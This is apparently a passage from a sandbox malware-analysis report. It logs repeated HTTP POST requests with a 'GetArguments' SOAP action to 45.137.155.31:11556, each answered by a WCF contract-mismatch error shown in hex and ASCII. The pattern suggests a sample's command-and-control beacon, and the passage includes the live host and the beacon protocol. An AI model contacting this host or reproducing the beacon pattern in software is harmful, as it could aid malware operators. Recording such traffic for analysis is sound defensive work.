                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:16.130131960 CEST10626INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:16.205310106 CEST10627INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:15 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:17.215059996 CEST10627OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:17.283859015 CEST10628INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:17.355427027 CEST10629INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:16 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:18.807960987 CEST10629OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:18.878890991 CEST10629INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:18.993797064 CEST10630INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:18 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:20.074364901 CEST10631OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:20.144990921 CEST10631INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:20.217818022 CEST10632INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:20 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:21.230635881 CEST10632OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:21.299559116 CEST10632INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:21.369700909 CEST10633INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:21 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:22.387101889 CEST10634OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:22.459809065 CEST10634INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:22.530771971 CEST10635INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:22 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:23.543819904 CEST10635OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:23.614036083 CEST10635INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:23.690289021 CEST10636INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:23 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 